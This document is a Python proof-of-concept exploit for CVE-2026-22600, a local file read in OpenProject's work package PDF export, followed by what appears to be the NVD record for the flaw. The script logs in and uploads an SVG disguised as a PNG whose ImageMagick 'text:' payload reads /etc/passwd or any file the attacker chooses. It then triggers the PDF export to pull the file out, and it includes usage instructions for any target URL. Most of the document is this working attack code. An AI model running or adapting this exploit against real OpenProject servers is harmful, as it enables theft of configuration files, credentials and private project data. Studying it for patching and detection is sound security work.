CVE-2026-22600

#!/usr/bin/env python3 """ CVE-2026-22600 PoC - OpenProject Local File Read via PDF Export This PoC demonstrates the LFR vulnerability in OpenProject's PDF export functionality. """ import requests import base64 import sys # Malicious SVG payload disguised as PNG MALICIOUS_SVG = '''<?xml version="1.0" encoding="UTF-8"?> <svg xmlns="http://www.w3.org/2000/svg" width="100" height="100"> <image href="text:;/etc/passwd" width="100" height="100"/> </svg>''' def create_malicious_png(): """Create a malicious file disguised as PNG with SVG content""" return MALICIOUS_SVG.encode('utf-8') def exploit_cve_2026_22600(base_url, username, password, target_file="/etc/passwd"): """ Exploit CVE-2026-22600: Local File Read in OpenProject Args: base_url: OpenProject base URL username: Valid username with attachment upload permission password: User password target_file: File path to read (default: /etc/passwd) Returns: Content of the read file if successful, None otherwise """ session = requests.Session() # Step 1: Login to OpenProject login_url = f"{base_url}/login" login_data = { "username": username, "password": password, "login": "登录" } try: response = session.post(login_url, data=login_data, timeout=30) if response.status_code != 200: print(f"[-] Login failed with status code: {response.status_code}") return None print("[+] Login successful") # Step 2: Create a new work package or find existing one # Assuming we have work package ID 1 for demonstration work_package_id = 1 # Step 3: Upload malicious SVG file disguised as PNG upload_url = f"{base_url}/api/v3/work_packages/{work_package_id}/attachments" malicious_content = create_malicious_png() # Modify payload to target specific file payload = MALICIOUS_SVG.replace("/etc/passwd", target_file) files = { 'file': ('malicious.png', payload.encode('utf-8'), 'image/png') } response = session.post(upload_url, files=files, timeout=30) if response.status_code not in [200, 201]: print(f"[-] File upload failed with status code: {response.status_code}") return None print(f"[+] Malicious file uploaded successfully") # Step 4: Trigger PDF export export_url = f"{base_url}/api/v3/work_packages/{work_package_id}/pdf_export" response = session.get(export_url, timeout=60) if response.status_code == 200: print("[+] PDF export triggered successfully") # The PDF will contain the content of the target file # In real attack, attacker would download and parse the PDF return response.content else: print(f"[-] PDF export failed with status code: {response.status_code}") return None except requests.RequestException as e: print(f"[-] Request failed: {str(e)}") return None if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: python3 {sys.argv[0]} <base_url> <username> <password> [target_file]") print(f"Example: python3 {sys.argv[0]} http://target.com:8080 admin password /etc/passwd") sys.exit(1) base_url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] target_file = sys.argv[4] if len(sys.argv) > 4 else "/etc/passwd" print(f"[*] Exploiting CVE-2026-22600 on {base_url}") print(f"[*] Target file: {target_file}") result = exploit_cve_2026_22600(base_url, username, password, target_file) if result: print("[+] Attack completed - Check downloaded PDF for file contents") else: print("[-] Attack failed")

{"cve": {"id": "CVE-2026-22600", "sourceIdentifier": "[email protected]", "published": "2026-01-10T02:15:48.743", "lastModified": "2026-01-14T22:25:56.047", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenProject is an open-source, web-based project management software. A Local File Read (LFR) vulnerability exists in the work package PDF export functionality of OpenProject prior to version 16.6.4. By uploading a specially crafted SVG file (disguised as a PNG) as a work package attachment, an attacker can exploit the backend image processing engine (ImageMagick). When the work package is exported to PDF, the backend attempts to resize the image, triggering the ImageMagick text: coder. This allows an attacker to read arbitrary local files that the application user has permissions to access (e.g., /etc/passwd, all project configuration files, private project data, etc.). The attack requires permissions to upload attachments to a container that can be exported to PDF, such as a work package. The issue has been patched in version 16.6.4. Those who are unable to upgrade may apply the patch manually."}, {"lang": "es", "value": "OpenProject es un software de gestión de proyectos de código abierto y basado en la web. Una vulnerabilidad de lectura de archivos locales (LFR) existe en la funcionalidad de exportación a PDF de paquetes de trabajo de OpenProject anterior a la versión 16.6.4. Al cargar un archivo SVG especialmente diseñado (disfrazado como PNG) como adjunto de un paquete de trabajo, un atacante puede explotar el motor de procesamiento de imágenes de backend (ImageMagick). Cuando el paquete de trabajo se exporta a PDF, el backend intenta redimensionar la imagen, lo que activa el ImageMagick text: coder. Esto permite a un atacante leer archivos locales arbitrarios a los que el usuario de la aplicación tiene permisos de acceso (por ejemplo, /etc /passwd, todos los archivos de configuración del proyecto, datos privados del proyecto, etc.). El ataque requiere permisos para cargar adjuntos a un contenedor que pueda exportarse a PDF, como un paquete de trabajo. El problema ha sido parcheado en la versión 16.6.4. Aquellos que no puedan actualizar pueden aplicar el parche manualmente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 5.3}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 5.3}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openproject:openproject:*:*:*:*:*:*:*:*", "versionEndExcluding": "16.6.4", "matchCriteriaId": "6F91D546-F062-436F-B174-02FCE95C2376"}]}]}], "references": [{"url": "https://github.com/opf/openproject/releases/tag/v16.6.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/opf/openproject/security/advisories/GHSA-m8f2-cwpq-vvhh", "source": "[email protected]", "tags": ["Patch"]}]}}